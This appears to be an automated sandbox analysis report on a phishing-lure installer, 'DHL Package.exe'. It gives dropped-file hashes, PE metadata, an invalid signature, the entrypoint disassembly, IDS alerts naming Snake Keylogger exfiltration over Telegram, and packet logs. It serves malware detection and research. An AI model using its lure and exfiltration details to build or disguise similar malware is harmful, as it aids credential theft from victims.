Preview:	........yk...............y..A..X...(u........9...3..#..kJ.....q.+.....B.."b........x......EA.........W.........]+.....E.e..p...............l..................W..........}...................p................u)....o........^l......*.....3..oz7..{j.....0.........?....s.A.....g;.....(.N.N.!El.....C...........x...-... ..........$.........[.F...T..........T........{.........U..o.yY....p......c..........$.....$......I....`.Q.v&........G..%.}...................Q...m..........^\|........&7...........#..'....MA..p....k.....i......x(...............,..V.Ke...M.%.....I~K......\...he}..5/...%................9.......................?...........<................\|.......q....g.V...K...7Y.....C......W..........>'....................<............a.1......[3.E......p.D........a....w..n......m....W......'.............cR.......R..I....._...........jq......B'.u.........KMC{......q.t..........p.....?K......t.....N.'.....T...T..g........x..m........A...E......F...:.........f......E....5.......T...F.

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\piggy.riv

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	data
Category:	dropped
Size (bytes):	10019
Entropy (8bit):	5.025184708064648
Encrypted:	false
SSDEEP:	192:A9k5U5K4UkC9ZN17ktv4u2vwusr8JwlHRPguH48XsSNdJOAosgASLfljirw:AsMtlCHTwCu29K8uJRhH488oJ4MSzc0
MD5:	0843D03D3C1CC92613470216DE0EF1A1
SHA1:	AC8E656C3A2044B4FC51B38BA985E57EABF0B995
SHA-256:	706A3591732AB4FC5A227386E6C3B32592F9A5467327C876D45A3070035C844B
SHA-512:	AFDF0C65FD83F494A9D2A7094614D66608D7EEF0E5427C74D2C2E787F3338C0C530A57055B5E3DB5AC90C0C6CBC4F683D3C590E5477260BD7F9EDB141A41B7CC
Malicious:	false
Preview:	.....{...?.)....=..............C.....]..."u...SX......+WI...,...`..........v.N...m.BR.%(.............[...C.....D..I.XB..$.....................O.2...........r..e..`.U......z.y_9..K.....1.._(........<..(......h.........L....M....x...S&....{.a................u;.....~......Ru....O.....a......c...6..;...7.............1..u..)r......z.U&....t.......Q........}.........b...m.... .............D...s..........._G....M.....Q..Zd.._...9........K......b).......!....Z..N..o^.a......`..2.......................n........H....E..T...9......~.Zx..8....g.....S..=.L.......S[......y......9..W............T...............v................j.p..?......[..............*......O...,.2.................#.....\|....?.,...Vv.....XS.X.:...z.....p.v.......L......I..............4..{.........B'!..3....../n......lR.#........(........Y.7...0/....X............~.....3.............Ht..a.Sh'=.................#..%..4............-.h...:1.............(............;.2...E......................' .,...F..........Y..\..... ....g.

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\produktionskden.slu

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	data
Category:	dropped
Size (bytes):	7829
Entropy (8bit):	4.964465618724154
Encrypted:	false
SSDEEP:	192:cvQVyl9vo9vkEB/g8s5GI4SGvPEu/mVI1PVpb80:c4V4xbEdR8T4SaFuVI7
MD5:	2BB28D61DDF2533CCBB803DDBE326BDC
SHA1:	8B7C2571F544EC2AED6AC232D561FEE3016D99C8
SHA-256:	D757263BDBCDB4AE46691DF9BCB12E168F745A5716A9FEEA75C20E359E2AD2AF
SHA-512:	66DDBF35BA173A8DCC8204426E66200436347890D2154A8BC604CDBE2DA59577DCC35156D1A4CE46CF1E775D0E9AA6E875C28841B4F7ADC78A77C7501E285CC8
Malicious:	false
Preview:	...M.x....7..................+.R...Z"W.]....l.+...5..^........N^...W.....?....}.I......................................^.2.x...V....Q......................q......p2...^...............%..\|.....@.8.^..S.L';....a.....t...]..t}...f....ML.....&..........................~a......=... ...&.....%-..'.I.............7.......$.................,......j.......NJhh....'.#k.K......0..M.h.....&...T........./..........Z\..............4....L....M.......&.}..........(R.....@..0...X..?.1...b....pM.......F....L.G..y....8yA%..E.....^...............\.N.....M..[.......<...T....u........i......i..............._.........._I.....A.................N..'.....@.............l.....1..............#..........f..w=.....el..h.7... $....~..................x....]..R..7...........P."..........Y.l}....."......R........j........ ............1......}..........._......!....................................%a"w...........N..........%....`....3.........^.....OU.F....E..8.]..U.............:..z[...9g...'....^*........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.915503481056126
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL Package.exe
File size:	352'704 bytes
MD5:	ceb0fc229f47b61909ce0e6a68dd191f
SHA1:	93862169c62ec357ae869c50e5249fc16bab9cc9
SHA256:	4f3ec860e9371f32df06c6d342b6e16bdc8ad4c08aeeaa8f2a66549750805603
SHA512:	144d51e428158fc1f0c4b35d49c658f4665ac5a2bf2622aed782dfc87aa45155f9c9e55d79f21abf8a2af5742405d4f3505f158ae2992d63430fa5db1076fb64
SSDEEP:	6144:VMm4CCe7+uZAh8J7OPYkexqSiLIQ0QfCqJ6v58FG9bBo6zEJR2X3g38Gn6s9l/cK:VMwAeAdexqSiX0oC9v9b66zSR2HgsGnj
TLSH:	3274122432B0D417E1AE5534587ADBB68BF9F24B20B0934F37507F4FB920A91AF19B85
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....

File Icon


Icon Hash:	3179715bd1412531

Static PE Info

General

Entrypoint:	0x40348f
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60FC9193 [Sat Jul 24 22:17:55 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6e7f9a29f2c85394521a08b9f31f6275

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Puzzlers Carboniferous ", O=Rusfesten, L=Saint-Flour, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	31/01/2024 11:29:47 30/01/2027 11:29:47
Subject Chain	CN="Puzzlers Carboniferous ", O=Rusfesten, L=Saint-Flour, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Version:	3
Thumbprint MD5:	CAD4AA9BC94C673CBFC2B3D047E99128
Thumbprint SHA-1:	053E4B9235060E1A0955C6D003E1EE5CFB7C46B3
Thumbprint SHA-256:	C57D17F0A46275CD75006544EB7EA4258CF9A83B1DD742474BAD376B2B0C00EA
Serial:	7A2D03761AD4BA8E2D1A7A6B07F7DB907512E4DD

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080CCh]
call dword ptr [004080D0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A22Ch], eax
je 00007F6518854013h
push ebx
call 00007F6518857301h
cmp eax, ebx
je 00007F6518854009h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F651885727Bh
push esi
call dword ptr [00408154h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F6518853FECh
push 0000000Bh
call 00007F65188572D4h
push 00000009h
call 00007F65188572CDh
push 00000007h
mov dword ptr [0042A224h], eax
call 00007F65188572C1h
cmp eax, ebx
je 00007F6518854011h
push 0000001Eh
call eax
test eax, eax
je 00007F6518854009h
or byte ptr [0042A22Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408298h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216C8h
call dword ptr [0040818Ch]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x59000	0x3488	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x55830	0x990	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6411	0x6600	1be075c408f39c844a297d85521f5b93	False	0.6545266544117647	data	6.40243296676441	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1398	0x1400	e3e8d62e1d2308b175349eb9daa266c8	False	0.4494140625	data	5.137750894959169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	92925084f722469459e6111e8ee4a9d0	False	0.5013020833333334	data	4.020801365171916	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x3488	0x3600	364d310ee66e735e33bf251142f51d25	False	0.5782696759259259	data	5.662210675483562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x59328	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.7673240938166311
RT_ICON	0x5a1d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.802797833935018
RT_ICON	0x5aa78	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.38414634146341464
RT_ICON	0x5b0e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.7001445086705202
RT_ICON	0x5b648	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4381720430107527
RT_ICON	0x5b930	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5405405405405406
RT_DIALOG	0x5ba58	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x5bb10	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5bc58	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5bd58	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5be78	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5bed8	0x5a	data	English	United States	0.7111111111111111
RT_VERSION	0x5bf38	0x2c0	data	English	United States	0.4715909090909091
RT_MANIFEST	0x5c1f8	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5640243902439024

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-07T09:28:23.238618+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:34.383581+0200	TCP	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	49750	443	192.168.11.20	149.154.167.220
2024-08-07T09:28:18.208911+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:21.129680+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:26.441063+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:22.862325+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49745	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:20.067426+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:24.316459+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:21.807309+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49744	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:26.060314+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49748	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:23.929722+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49746	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:24.986734+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49747	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:20.751723+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49743	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:22.191952+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73
2024-08-07T09:28:15.598712+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49740	80	192.168.11.20	172.93.120.113
2024-08-07T09:28:27.118767+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49749	443	192.168.11.20	172.67.177.134
2024-08-07T09:28:25.394377+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49741	80	192.168.11.20	132.226.247.73

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 7, 2024 09:28:15.129513979 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.361756086 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.362138987 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.363061905 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.597816944 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.598361015 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.598457098 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.598711967 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.600583076 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.600677967 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.600832939 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.600893021 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.602659941 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.602754116 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.602953911 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.602953911 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.604878902 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.604979992 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.605086088 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.605148077 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.606971025 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.607065916 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.607184887 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.607306957 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.832040071 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.832145929 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.832262039 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.832340002 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.832401037 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.832401037 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.832465887 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.832704067 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.833622932 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.833724022 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.833847046 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.834053993 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.835791111 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.835885048 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.836055994 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.836117029 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.837977886 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.838072062 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.838360071 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.840136051 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.840279102 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.840357065 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.840500116 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.842446089 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.842540026 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.842689991 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.842746973 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.844644070 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.844741106 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.844960928 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.844961882 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.846651077 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.846745968 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.846865892 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.847031116 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.848773956 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.848884106 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:15.848982096 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:15.849239111 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.064600945 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.064724922 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.064821005 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.064822912 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.064896107 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.064986944 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.065068007 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.065121889 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.066787004 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.066890001 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.067028046 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.067084074 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.068849087 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.068945885 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.069070101 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.069134951 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.071069002 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.071163893 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.071357965 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.071357965 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.073167086 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.073266029 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.073359013 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.073513985 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.075582027 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.075676918 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.075799942 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.075943947 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.077702045 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.077799082 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.077918053 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.077980995 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.079873085 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.079972029 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.080074072 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.080137968 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.082010031 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.082129002 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.082290888 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.082433939 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.084135056 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.084289074 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.084367990 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.084467888 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.086328030 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.086410999 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.086628914 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.088536024 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.088634014 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.088757038 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.088836908 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.090579987 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.090673923 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.090799093 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.090858936 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.092922926 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.093019962 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.093244076 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.093244076 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.095026016 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.095120907 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.095241070 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.095334053 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.097135067 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.097229004 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.097349882 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.097407103 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.099364996 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.099462986 CEST	80	49740	172.93.120.113	192.168.11.20
